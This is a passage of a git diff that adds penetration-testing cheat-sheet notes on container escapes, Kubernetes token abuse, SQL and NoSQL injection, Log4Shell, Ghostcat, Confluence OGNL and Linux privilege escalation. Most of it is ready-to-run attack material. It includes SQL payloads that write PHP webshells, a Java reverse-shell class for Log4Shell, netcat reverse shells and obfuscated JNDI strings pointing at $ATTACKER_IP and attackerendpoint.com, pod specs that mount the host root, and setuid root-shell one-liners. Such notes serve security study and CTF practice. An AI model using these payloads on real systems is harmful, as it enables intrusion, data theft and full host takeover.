remotely or socat locally +```sh +socat - UNIX-CONNECT:/var/run/docker.sock +POST /containers//attach?stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1 +Host: +Connection: Upgrade +Upgrade: tcp + +HTTP/1.1 101 UPGRADED +Content-Type: application/vnd.docker.raw-stream +Connection: Upgrade +Upgrade: tcp +``` + +## Escape through DB + +* Login into DB +* Create table +* Inject PHP code +* Select table content intoa file the user can read +* Execute the file +```sql +create table h4x0r (pwn varchar(1024)); +insert into h4x0r (pwn) values (''); +select '' INTO OUTFILE '/var/www/html/shell.php'; +``` +* curl the webshell hon the exploited host +```sh +curl /shell.php?cmd=id +``` + +## Dirty c0w +https://github.com/dirtycow/dirtycow.github.io + +## runC +[CVE-2019-5736](https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-5736/) + +## Securing a Container +* Least Privileges +* Seccomp +* Securing Registry via TLS + +## Checking if you are inside a container +* Low process count +```sh +ps aux +``` + +* `.dockerenv` in `/` +```sh +cd / && ls -lah +``` + +* cgroups contain docker names +```sh +pwd /proc/1 +cat cgroups +``` diff --git a/Exploits/Containers/Kubernetes.md b/Exploits/Containers/Kubernetes.md new file mode 100644 index 0000000..e57bc07 --- /dev/null +++ b/Exploits/Containers/Kubernetes.md @@ -0,0 +1,59 @@ +# Kubernetes + +* Check [kubeletctl](https://github.com/cyberark/kubeletctl.git) as well + +## Account Token +* Snatch an account token from inside a pod +* Use it via kubectl, watch out for authorizations and namespaces +```sh +kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 auth can-i --list +kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 get namespaces +``` +* Save secrets from namespaces as yaml file +```sh +kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 get secrets -o yaml -n kube-system > kube-system.yml +kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 get secrets -n kube-system +``` +* Specify secret +```sh +kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 get secrets flag -n kube-system -o yaml +``` + +## Privilege Escalation +* [appsecco's blog](https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216) +* Show images via +```sh +kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 get pods +kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 get pod -o yaml +kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 get nodes -o yaml +``` +* Use a found image to create the following yaml file +```yaml +apiVersion: v1 +kind: Pod +metadata: + name: attacking-pod +spec: + containers: + - image: + name: + command: [ "/bin/sh", "-c", "--" ] + args: [ "while true; do sleep 30; done;" ] + volumeMounts: + - mountPath: /host + name: host + volumes: + - name: host + hostPath: + path: / + type: Directory +``` +* `/` of the node is mounted to `/host` inside the new pod +* Create the pod via +```sh +kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 apply -f +``` +* Run an interactive session on the pod +```sh +kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 exec -it attacking-pod -- /bin/bash +``` diff --git a/Exploits/Containers/LXC.md b/Exploits/Containers/LXC.md new file mode 100644 index 0000000..c3edf01 --- /dev/null +++ b/Exploits/Containers/LXC.md @@ -0,0 +1,32 @@ +# LXC + +## Privilege Escalation + +### Member of lxd Group + +* [Hackingarticles article](https://www.hackingarticles.in/lxd-privilege-escalation/) +* User has to be in `lxd` group, not necessarily `sudo`. + +#### Usage +* Clone and build +```sh +git clone https://github.com/saghul/lxd-alpine-builder.git +cd lxd-alpine-builde && sudo && ./build alpine +``` +* Upload to target +* Import alpine image +```sh +lxc image import ./alpine-v3.14-x86_64-20210920_2132.tar.gz --alias myimage +``` +* Prepare image +```sh +lxc image list +lxc init myimage ignite -c security.privileged=true +lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true +lxc start ignite +lxc exec ignite /bin/sh +``` +* Host `/` is mounted at `/mnt/root` inside the container +* `root` directory is at `/mnt/root/root` + + diff --git a/Exploits/Containers/MicroK8s.md b/Exploits/Containers/MicroK8s.md new file mode 100644 index 0000000..f2bebac --- /dev/null +++ b/Exploits/Containers/MicroK8s.md @@ -0,0 +1,39 @@ +# MicroK8s + + +## Usage + +* Create `pod.yaml` configuration +```yaml +apiVersion: v1 +kind: Pod +metadata: + name: harry-podder +spec: + containers: + - name: shell + image: localhost:47111/alpine + command: + - "/bin/bash" + - "-c" + - "sleep 10000" + volumeMounts: + - name: root + mountPath: /mnt/root + volumes: + - name: root + hostPath: + path: / + type: Directory +``` + +* Deploy the pod +```sh +microk8s kubectl apply -f pod.yaml +``` +* Run the Pod +```sh +microk8s kubectl exec -it harry-podder -- /bin/bash +``` + + diff --git a/Exploits/DNS/Zone Transfer.md b/Exploits/DNS/Zone Transfer.md new file mode 100644 index 0000000..9ca6fce --- /dev/null +++ b/Exploits/DNS/Zone Transfer.md @@ -0,0 +1,6 @@ +# DNS Zone Transfer + +Relies on misconfiguration of the zone's master. Just query a domain from the master, if possible. Results in a disclosure of subdomains and all records previously made. +```sh +drill axfr test.com @ +``` diff --git a/Exploits/Databases/MSSQL.md b/Exploits/Databases/MSSQL.md new file mode 100644 index 0000000..b175ec0 --- /dev/null +++ b/Exploits/Databases/MSSQL.md @@ -0,0 +1,9 @@ +# MSSQL + +# Usage + +* `sqsh` as a shell +* After connection is established check `xp_cmdshell' +```sh +xp_cmdshell 'whoami'; +``` diff --git a/Exploits/Databases/NoSQL Injection.md b/Exploits/Databases/NoSQL Injection.md new file mode 100644 index 0000000..b75f00f --- /dev/null +++ b/Exploits/Databases/NoSQL Injection.md @@ -0,0 +1,38 @@ +# NoSQL Injections + +* No tables, but files (collections) +* Examples are Elasticsearch, MongoDB, Redis, CouchDB. + +## Querying +* Filter instead of SQL queries +* [Redis docs](https://redis.io/documentation) +* [MongoDB operators](https://docs.mongodb.com/manual/reference/operator/query/) +* [Elasticsearch docs](https://www.elastic.co/guide/index.html) + +# Operators +* Most common +```sql +$and +$or +$eq +$ne +$gt +$where +$exists +$regex +``` + +## Tips & Tricks + +* Pass HTTP parameter as an array instead of `user=` and `password=` use `user[$operator]=foo` and `password[$operator]=bar` + * 2D array via `user[$nin][]=foo` + +## Example +* POST or GET parameters +```sh +username=admin&password[$ne]=admin +``` +* JSON +```json +{"username":"user","password":{"$ne":""} } +``` diff --git a/Exploits/Databases/SQL Injection.md b/Exploits/Databases/SQL Injection.md new file mode 100644 index 0000000..27c9ab1 --- /dev/null +++ b/Exploits/Databases/SQL Injection.md @@ -0,0 +1,157 @@ +# SQL Injection + +* [MySQL Comments](https://blog.raw.pm/en/sql-injection-mysql-comment/) + +## Finding an Opportunity +* GET parameter +```sh +http://example.com/index.php?id=' or 1=1 -- - +``` +* Sometimes an ID or may come first +```sh +http://example.com/index.php?id=10 or 1=1 -- + +http://example.com/index.php?id=10' or '1'='1'-- - +http://example.com/index.php?id=-1' or 1=1 -- -&password=x +``` +* Provoke error to gain information +```sh +http://example.com/index.php?id=' +``` +* **Incase of client side sanitization craft the URL instead of using the form!!!** + +## Usage +* Example, terminate string via `'` and resolve via tautology, comment the rest of the string via `--` +```sql +SELECT * FROM users WHERE username = admin AND password := ' and 1=1 -- - +SELECT * FROM users WHERE username = admin AND password := ' or 1=1 --+ +``` + +### Boolean True and False +```sql +SELECT * FROM users WHERE username = admin AND password :=1' or 1 < 2 --+ +SELECT * FROM users WHERE username = admin AND password :=1' or 1 > 2 --+ +``` +* Blind boolean base substring fuzzing, one char at a time, by inspecting the return value after each inserted char. +```sql +' UNION SELECT null,null,null where database() like 'da%';-- - +``` + +### Time based +* Checking input blindly via sleep() function. Count number of cols in this way. If it is successful, the sleep(5) function executes +```sql +' union select sleep(3), null; -- - +``` + +### Blind injection // Guessing characters +```sh +http://example.com/?id=1' and substr((select database()),1,1) < 105 --+ +``` +```sh +http://example.com/?id=1' and (ascii(substr((select database(),1,1)) = 115 --+ +``` +* Function substr(string, start, length) +* sqlmap via `--level=5 --risk=3 --dbms=sqlite --technique=b --dump` + +### Union based +* _First method__ check by order until error occurs +```sql +' order by 1 -- - +' order by 2 -- - +' order by 3 -- - +``` +* __Second method__ fuzzing NULL values, followed by fuzzing data types +* Check number of cols +```sql +' UNION SELECT NULL-- +' UNION SELECT NULL,NULL-- +' UNION SELECT NULL,NULL,NULL-- +# until the error occurs +``` +* Check which one is a string +```sql +' UNION SELECT 'a',NULL,NULL,NULL-- +' UNION SELECT NULL,'a',NULL,NULL-- +' UNION SELECT NULL,NULL,'a',NULL-- +' UNION SELECT NULL,NULL,NULL,'a'-- +``` +* Retrieve content, for cols and comment two times as an example. Or dump database +```sql +' UNION SELECT NULL,NULL,database(),NULL,NULL from users -- // +' UNION SELECT NULL,username,password,NULL FROM users -- // +``` + +* Retrieve content by union poking the count and order, afterwards extracting tables via +```sh +0 union select null, null, database() +0 union select null, null, group_concat(table_name) from information_schema.tables where table_schema = 'found_db' +0 union select null, null, group_concat(column_name) from information_schema.columns where table_name = 'found_tablename' +0 union select null, null, group_concat(username, ':', password from found_tablename +``` + +* [OWASP SQLi Docs](https://www.owasp.org/index.php/SQL_Injection) + +### Identify Database +```sh +id=sqlite_version() +id=@@version # mysql/mssql +id=(SELECT banner FROM v$version) # oracle +``` + +#### SQL Functions +* Use sql functions to fumble the tables & cols via union +* [source](https://medium.com/@nyomanpradipta120/sql-injection-union-attack-9c10de1a5635) +* Extract tables +```sql +1' and 1=2 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema = database() -- - +``` +* sqlite specific +```sql +' UNION SELECT sql, sql FROM sqlite_master -- - +``` +```sql +(SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='usertable') +(SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%') +``` +* Extract cols +```sh +1' and 1=2 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema = database() and table_name ='user'-- - +``` +* Data from cols +```sql +1' and 1=2 union select 1,group_concat(username,0x3a,password),3,4 from user-- - +``` + +## Insert + +* Check user file permissions +```sql +union all select 1,group_concat(user,0x3a,file_priv),3,4 from mysql.user -- - +``` + +* Insert file through insertion of `system()` or `exec_shell()` and a get parameter +```sql +'into outfile '/var/www/html/shello.php' lines terminated by 0x3c3f706870206563686f20223c7072653e22202e2073797374656d28245f4745545b22636d64225d29202e20223c2f7072653e223b3f3e -- - +``` + +* Insert `` +```sql +" Union Select 1,0x201c3c3f7068702073797374656d28245f4745545b2018636d6420195d293b203f3e201d,3,4 INTO OUTFILE '/var/www/html/shell.php' -- - +``` + +### Examples +* sqli inside HTTP request to an API. Five values inside select have been discovered before +```HTTP +GET /about/0 UNION select column_name, null,null,null,null from information_schema.columns where table_name = 'user' HTTP/1.1 +``` + * Get col names + ```HTTP + GET /about/0 UNION all select group_concat(column_name), null,null,null,null from information_schema.columns where table_name = 'user' HTTP/1.1 + ``` + * Get notes from users by id + ```HTTP + GET /about/0 UNION all select notes, null, null, null, null from users where id = 4711 HTTP/1.1 + ``` + +## Payloads +* [List](https://github.com/payloadbox/sql-injection-payload-list#generic-sql-injection-payloads) + diff --git a/Exploits/Databases/SQLmap.md b/Exploits/Databases/SQLmap.md new file mode 100644 index 0000000..c593919 --- /dev/null +++ b/Exploits/Databases/SQLmap.md @@ -0,0 +1,44 @@ +# SQLmap + + +* [sqlmap](https://github.com/sqlmapproject/sqlmap.git) +* [CheatSheet](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/) +* [Examples](https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet) + +## Usage + +* Use `-r` with a saved HTTP request +```sh +sqlmap -r request.txt --dbms=mysql --dump +sqlmap -r request.txt --batch +``` +* Select form data automatically +```sh +sqlmap -u http:///site.php --forms --dump-all +``` +* [Get reverse shell via sqlmap](https://www.hackingarticles.in/shell-uploading-in-web-server-using-sqlmap/) + + +|Parameter|Details| +|---------|-------| +|-r|Uses the intercepted request save as a file| +|--dbms|DBMS of target| +|--dump|Dump the entire database| +|--dump-all|Dump everything| +|-p |TESTPARAMETER| +|--os-shell|Prompt for an interactive operating system shell| +|--os-pwn|Prompt for an OOB shell, Meterpreter or VNC| +|--tables|Show tables| +|-T|Specify table| + +## Other Tools + +### Damn Small SQLi Scanner (DSSS) +* [Script](https://github.com/stamparm/DSSS.git) +```sh +python dsss.py -u "http://example.com/index.php?id=" +``` + +### Online sqlmap +* [Link](https://suip.biz/?act=sqlmap) + diff --git a/Exploits/ImageMagick/ImageTragick.md b/Exploits/ImageMagick/ImageTragick.md new file mode 100644 index 0000000..0d80eb1 --- /dev/null +++ b/Exploits/ImageMagick/ImageTragick.md @@ -0,0 +1,3 @@ +# ImageTragick + +* [ImageTragick Website](https://imagetragick.com) diff --git a/Exploits/Java/Confluence OGNL.md b/Exploits/Java/Confluence OGNL.md new file mode 100644 index 0000000..cf2e7f6 --- /dev/null +++ b/Exploits/Java/Confluence OGNL.md @@ -0,0 +1,23 @@ +# CVE-2022-26134 + +* [NIST CVE-2022-26134](https://nvd.nist.gov/vuln/detail/CVE-2022-26134) +* Confluence versions: + * 1.3.0 to 7.4.17 + * 7.13.0 to 7.13.7 + * 7.14.0 to 7.14.3 + * 7.15.0 to 7.15.2 + * 7.16.0 to 7.16.4 + * 7.17.0 to 7.17.4 + * 7.18.0 to 7.18.1 +* Object Graph Navigation Language (OGNL) + +## Usage + +* Payload is a GET request which is set via the URI +```sh + ${@java.lang.Runtime@getRuntime().exec("touch /tmp/exploit")}/ +``` +* URL encode and curl for PoC + +* Use [Naqwda's exploit](https://github.com/Nwqda/CVE-2022-26134.git) + diff --git a/Exploits/Java/Ghidra Debug RCE.md b/Exploits/Java/Ghidra Debug RCE.md new file mode 100644 index 0000000..c688d64 --- /dev/null +++ b/Exploits/Java/Ghidra Debug RCE.md @@ -0,0 +1,19 @@ +# Ghidra Debug RCE + +* If debug mode is enabled, connect to it via `jdb` +```sh +jdb -attach $TARGET_IP:$TARGET_PORT +``` +```sh +classpath +classes +``` +* Stop the service +```sh +stop in org.apache.logging.log4j.core.util.WatchManager$WatchRunnable.run() +``` +* Wait until the breakpoint hits and start a reverse shell +```sh +print new java.lang.Runtime().exec("nc.traditional $ATTACKER_IP 4449 -e /bin/sh") +``` + diff --git a/Exploits/Java/Ghostcat.md b/Exploits/Java/Ghostcat.md new file mode 100644 index 0000000..4ab8094 --- /dev/null +++ b/Exploits/Java/Ghostcat.md @@ -0,0 +1,14 @@ +# Ghostcat + +* CVE-2020-1938 +* Msfconsole or [exploitdb](https://www.exploit-db.com/exploits/48143) +* Craft a manual war shell shown at [hacktrick's tomcat site](https://book.hacktricks.xyz/pentesting/pentesting-web/tomcat#reverse-shell) +* upload the file via +```sh +curl -T ./webshell.war -u 'user:password' http://$TARGET_IP:8080/manager/text/deploy?path=/shello +``` +* Visit the webshell at `$TARGET_IP:8080/shello/` +* Alternatively use a war reverse shell via +```sh +msfvenom -p java/jsp_shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=4449 -f war -o revshell.war +``` diff --git a/Exploits/Java/Log4Shell.md b/Exploits/Java/Log4Shell.md new file mode 100644 index 0000000..9768e5e --- /dev/null +++ b/Exploits/Java/Log4Shell.md @@ -0,0 +1,133 @@ +# Log4Shell + +* `log4j` < version 2.15.0rc2 +* [CVE-2021-44228](https://www.huntress.com/blog/rapid-response-critical-rce-vulnerability-is-affecting-java) +* [log4j vulnerability tester](https://log4shell.huntress.com/) +* [List of exploitable services](https://github.com/YfryTchsGD/Log4jAttackSurface) + +* Code inside a `param` value is parsed and a `${payload}` will be executed, for example +```sh +${sys:os.name} +${sys:user.name} +${log4j:configParentLocation} +${ENV:PATH} +${ENV:HOSTNAME} +${java:version} +``` +## Java Naming and Directory Interface JNDI + +* Vulnerability can be exploited via `${jndi:ldap:///foo}` + +## POC +```sh +curl 'http://$TARGET:8983/solr/admin/cores?foo=?$\{jndi:ldap://$ATTACKER_IP:4449\}' +``` +* Use HTTP header field as storage for payload or any other possible input field +```HTTP +X-Forwarded-For: ${jndi:ldap://$ATTACKER_IP:1389/foo} +Accept: ${jndi:ldap://$ATTACKER_IP:1389/foo} +X-Api-Version: ${jndi:ldap://$ATTACKER_IP:1389/foo} +``` + +## Usage + +* Fuzz endpoints to applicate the exploit on +* Clone and build [marshallsec](https://github.com/mbechler/marshalsec) via `mvn clean package -DskipTests` +* Java version should be the same as the one on the target +* A Proxy LDAP server to an HTTP server is needed + +* Compile following Java reverse shell via `javac Exploit.java -source 8 -target 8` to Exploit.class +```java +public class Exploit { + static { + try { + java.lang.Runtime.getRuntime().exec("nc -e /bin/bash $ATTACKER_IP 4449"); + } catch (Exception e) { + e.printStackTrace(); + } + } +} +``` +or another one +```java +import java.io.InputStream; +import java.io.OutputStream; +import java.net.Socket; + +public class Exploit { + static { + String host = "$ATTACKER_IP"; + int port = 4711; + String cmd = "/bin/sh"; + try { + Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start(); + Socket s = new Socket(host, port); + InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream(); + OutputStream po = p.getOutputStream(), so = s.getOutputStream(); + while (!s.isClosed()) { + while (pi.available() > 0) + so.write(pi.read()); + while (pe.available() > 0) + so.write(pe.read()); + while (si.available() > 0) + po.write(si.read()); + so.flush(); + po.flush(); + Thread.sleep(50); + try { + p.exitValue(); + break; + } catch (Exception e) { + } + } + p.destroy(); + s.close(); + } catch (Exception e) { + } + } +} +``` + +* Run the LDAP, HTTP and reverse shell +```sh +java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://$ATTACKER_IP:8000/#Exploit" +``` +```sh +php -S 0.0.0.0:8000 +``` +```sh +nc -lvnp 4449 +``` + +* Trigger via `curl 'http://$TARGET:8983/solr/admin/cores?foo=$\{jndi:ldap://$ATTACKER_IP:1389/Exploit\}'` + +## Detection + +* [Log4Shell-Hashes](https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashes.git) +* [Vulnerable Class + Jar hashes](https://github.com/nccgroup/Cyber-Defence/tree/master/Intelligence/CVE-2021-44228) +* [reddit mega thread](https://www.reddit.com/r/sysadmin/comments/reqc6f/log4j_0day_being_exploited_mega_thread_overview/) +* [Yara rules](https://github.com/darkarnium/CVE-2021-44228) + +* Parse logs for `jndi` + +## Obfuscation + +* Possible bypasses are as follows +```sh +${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//attackerendpoint.com/} +${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://attackerendpoint.com/} +${${upper:j}ndi:${upper:l}${upper:d}a${lower:p}://attackerendpoint.com/} +${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://attackerendpoint.com/z} +${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attackerendpoint.com/} +${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://attackerendpoint.com/} +${${::-j}ndi:rmi://attackerendpoint.com/} +``` + +## Mitgation + +* [Apache Solr security news](https://solr.apache.org/security.html) +* Add the following line to `solr.in.sh` +```toml +SOLR_OPTS="$SOLR_OPTS -Dlog4j2.formatMsgNoLookups=true" +10.10.90.21210.10.90.212 +``` diff --git a/Exploits/Java/Spring4Shell.md b/Exploits/Java/Spring4Shell.md new file mode 100644 index 0000000..bf47dd9 --- /dev/null +++ b/Exploits/Java/Spring4Shell.md @@ -0,0 +1,14 @@ +# CVE-2022-22965 + +* [Mitre CVE details](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-22965) +* Follow up to CVE-2010-1622 by circumventing the patch for the vulnerability +* RCE of `*.jsp` files through tomcat HTTP post request + +* Conditions + * > jdk9 + * Spring framework < 5.2, 5.2.0-19, 5.3.0-17 + * Apache tomcat + * spring as WAR package + * `spring-webvmc` or `spring-webflux` components of the spring framework + + diff --git a/Exploits/Linux/Capabilities.md b/Exploits/Linux/Capabilities.md new file mode 100644 index 0000000..2a393a4 --- /dev/null +++ b/Exploits/Linux/Capabilities.md @@ -0,0 +1,14 @@ +# Capabilities + +* [HackTricks](https://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-capabilities) + +## Usage +* Find capabilities +```sh +getcap -r / 2>/dev/null +``` + +* `cap_setuid` through `/bin/perl` +```sh +perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh"' +``` diff --git a/Exploits/Linux/DirtyPipe.md b/Exploits/Linux/DirtyPipe.md new file mode 100644 index 0000000..16e4ed9 --- /dev/null +++ b/Exploits/Linux/DirtyPipe.md @@ -0,0 +1,15 @@ +# CVE-2022-0847 + +* [Max Kellerman's post](https://dirtypipe.cm4all.com/) + +* 5.8 < Vulnerable kernels < 5.10.102 +* If a file can be read, it can be written also. + +## Usage + +* `splice(2)` moves data between files and through pipes without copying between kernel and user adress space +* Anonymous pipes permissions are not checked + * Read only permissions on pages do not matter on a pipe level +* Splice is putting data into the pipe and malicious data afterwards in the same one to overwrite the mem page +* `PIPE_BUF_FLAG_CAN_MERGE` flag has to be activated in order to write back to a file +* Works as long as there is an offset to start of a page in the beginning of the writing diff --git a/Exploits/Linux/ExifTool.md b/Exploits/Linux/ExifTool.md new file mode 100644 index 0000000..ab274bf --- /dev/null +++ b/Exploits/Linux/ExifTool.md @@ -0,0 +1,12 @@ +# CVE-2021-22204 + +* Craft an a payload and execute it via exiftool +* [Article](https://blog.convisoappsec.com/en/a-case-study-on-cve-2021-22204-exiftool-rce/) + +## Usage +* Payload is `(metadata "\c${system('id')};")` +```sh +sudo apt install djvulibre-bin +bzz payload payload.bzz +djvumake exploit.djvu INFO='1,1' BGjp=/dev/null ANTz=payload.bzz +``` diff --git a/Exploits/Linux/Groups.md b/Exploits/Linux/Groups.md new file mode 100644 index 0000000..2de2950 --- /dev/null +++ b/Exploits/Linux/Groups.md @@ -0,0 +1,3 @@ +# Groups + +* [steflan-security](https://steflan-security.com/linux-privilege-escalation-exploiting-user-groups/) diff --git a/Exploits/Linux/LD Preload.md b/Exploits/Linux/LD Preload.md new file mode 100644 index 0000000..4e99b97 --- /dev/null +++ b/Exploits/Linux/LD Preload.md @@ -0,0 +1,56 @@ +# LD_PRELOAD + +* Preload libs and do interpositioning of functions. + +* `man ld.so` +* `man dlsym`, `dlsym()` calls the original function + +## Example 1 +* Interpositioning of `_init()` +```sh +#include +#include +#include + +void _init() { + unsetenv("LD_PRELOAD"); + setgid(0); + setuid(0); + system("/bin/bash"); +} +``` +* `gcc -fPIC -shared -o lib.so lib.c -nostartfiles` +* `sudo LD_PRELOAD=lib.so apache2` +* `$ id` + + +## Example 2 +* Interpositioning of `write()` +```C +#include +#include +#include // Contains _GNU_SOURCE from man dlsym +#include +ssize_t write(int fildes, const void *buf, size_t nbytes) +{ + ssize_t result; + do the thing; + return result; +} +``` +* In case the symbol lookup returns an error libdl is linked +```sh +gcc -ldl interpositioning.c -fPIC -shared -D _GNU_SOURCE -o interpositioning.so -ldl` +``` +## Preloading +* Dependent on the installation status of lib32 and/or lib64 and various packages the path of `LD_PRELOAD` has to be set differently. These may look as follows +* `LD_PRELOAD=./interpositioning.so ` +or +* `export LD_PRELOAD=$(pwd)/interpositioning.so` +or +* Global preload via `/etc/ld.so.preload` +or +* Change the preload path via `LD_PRELOAD_PATH` + +* Verify via `ldd ` + diff --git a/Exploits/Linux/NFS RootSquash.md b/Exploits/Linux/NFS RootSquash.md new file mode 100644 index 0000000..87b8b01 --- /dev/null +++ b/Exploits/Linux/NFS RootSquash.md @@ -0,0 +1,21 @@ +# NFS RootSquash + +* [hacktricks](https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe) +* `no_root_squash` has to be as an option on the NFS device + +## Usage +* `showmount -e ` +* `mkdir /tmp/net_volume` + +* Connect to NFS share +```sh +mount -o rw,vers=2 :/tmp /tmp/net_volume +``` + +* Create root shell inside the dir of the share +```sh +echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/net_volume/shell.c +gcc /tmp/net_volume/shell.c -o /tmp/net_volume/shell +chmod +s /tmp/net_volume/shell +``` + diff --git a/Exploits/Linux/OverlayFS.md b/Exploits/Linux/OverlayFS.md new file mode 100644 index 0000000..826695f --- /dev/null +++ b/Exploits/Linux/OverlayFS.md @@ -0,0 +1,6 @@ +# CVE-2021-3493 + +* Kernel module, enables aggregation of mountpoints in a single tree of which parts are writeable others are not +* [Exploit](https://ssd-disclosure.com/ssd-advisory-overlayfs-pe/) + + diff --git a/Exploits/Linux/PolKit.md b/Exploits/Linux/PolKit.md new file mode 100644 index 0000000..eca25ba --- /dev/null +++ b/Exploits/Linux/PolKit.md @@ -0,0 +1,40 @@ +# CVE-2021-3560 + +* Exploit `< 0.105-26ubuntu1.1` + + +## Racing Condition +* Request creation of account via dbus message and `pkexec`. sleep time is variable. +```sh +dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:user1 string:"New Account" int32:1 & sleep 0.005s; kill $! +``` + * Create password via `openssl passwd -6 -salt salt password123` +```sh +dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1000 org.freedesktop.Accounts.User.SetPassword string:'$6$salt$cevuzTZ/QBjzuZG0/ebEeedmcTnhyM8ITUu8K032Cp2XvIibq7voqYagm18bwpLBqrg/l/l6YxTmKKibJz5r10' string:'New Password' & sleep 0.005s; kill $! +``` +* Request is killed after polkits receives it + +* Polkit requests uid of user who sent the message, which has been deleted +* Error will be thrown +* Uid turns to root afterwards +* Request succeeds + +* `su user1` and `sudo -s` + + +# Priv Esc with Two Sessions +* User has to be member of group `sudo` +* Open two ssh sessions +* In session one check the PID +```sh +echo $$ +``` +* In the other session +```sh +pkttyagent --process +``` +* In session one do +```sh +pkexec "/bin/bash" +``` +* Enter password in session two diff --git a/Exploits/Linux/Racing Conditions.md b/Exploits/Linux/Racing Conditions.md new file mode 100644 index 0000000..254c626 --- /dev/null +++ b/Exploits/Linux/Racing Conditions.md @@ -0,0 +1,22 @@ +# Racing Conditions + +## Read files from another user + +* The file of interest needs to be opened by a process which is a suid binary (here named `read_reds`) and creates a file descriptor to it +* The file of intereset is called `root_credentials` and is owned by root +* Create a file +```sh +touch yo +``` +* Compile `gistfile.txt` from [live overflow's repo](https://gist.github.com/LiveOverflow/590edaf5cf3adeea31c73e303692dec0) +```sh +gcc gistfile.c -o rename_file +``` +* Inside session 1 start the binary +```sh +./rename_file yo root_credentials +``` +* Inside session to try to read `root_credentials` until it succeeds +```sh +./read_creds root_credentials +``` diff --git a/Exploits/Linux/SetCap.md b/Exploits/Linux/SetCap.md new file mode 100644 index 0000000..625270c --- /dev/null +++ b/Exploits/Linux/SetCap.md @@ -0,0 +1,13 @@ +# setcap + +* Set capabilities of a binary +* [Hacktrick's setuid page](https://book.hacktricks.xyz/linux-hardening/privilege-escalation/euid-ruid-suid) + + +## Usage + +* If there is an S-bit or sudo on setcap do the following. Copy python binary and +```sh +setcap cap_setuid+ep /absolute/path/to/copied/python3 +python3 -c "import os; os.setuid(0); os.system('/bin/bash')" +``` diff --git a/Exploits/Linux/Shared Object Injection.md b/Exploits/Linux/Shared Object Injection.md new file mode 100644 index 0000000..76f39ef --- /dev/null +++ b/Exploits/Linux/Shared Object Injection.md @@ -0,0 +1,24 @@ +# Shared Object Injection + +* [gaffe23](https://github.com/gaffe23/linux-inject) +* [exploit-db](https://www.exploit-db.com/papers/37606) + +* Test binary via +```sh +strace 2>&1 | grep -i -E "open|access|no such file" +``` + +## Example + +```sh +#include +#include + +static void inject ( ) __attribute__ ( (constructor) ); + +void inject ( ) { + system ( "cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p" ); +} +``` +* `gcc -fPIC -shared -o ~/.config/lib.so ~/.config/lib.c` +* Run binary using the lib diff --git a/Exploits/Linux/Shell Shock.md b/Exploits/Linux/Shell Shock.md new file mode 100644 index 0000000..dfc0209 --- /dev/null +++ b/Exploits/Linux/Shell Shock.md @@ -0,0 +1,6 @@ +# Shell Shock + +* Check target via +```sh +curl -A "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id" http:///cgi-bin/test/test.cgi +``` diff --git a/Exploits/Linux/Wildcard Exploitation.md b/Exploits/Linux/Wildcard Exploitation.md new file mode 100644 index 0000000..d48d004 --- /dev/null +++ b/Exploits/Linux/Wildcard Exploitation.md @@ -0,0 +1,26 @@ +# Wildcard usage +* [Leon Juranic has shown it](https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/) + +## Another Example + +* cronjob gets backup data from `/var/www/html` via `tar cf backup.tar *`. The reverse shell and the parameters need to be files in this directory to get called by tar and be executed. + +```sh +echo "mkfifo /tmp/oytqnhq; nc 0/tmp/oytqnhq 2>&1; rm /tmp/oytqnhq" > shell.sh +echo "" > "--checkpoint-action=exec=sh shell.sh" +echo "" > "--checkpoint=1" +``` +or +```sh +echo "mkfifo /tmp/oytqnhq; nc 0/tmp/oytqnhq 2>&1; rm /tmp/oytqnhq" > /var/www/html/shell.sh +touch "/var/www/html/--checkpoint-action=exec=sh shell.sh" +touch "/var/www/html/--checkpoint=1" +``` + +## touched Filename Options + +* Give full 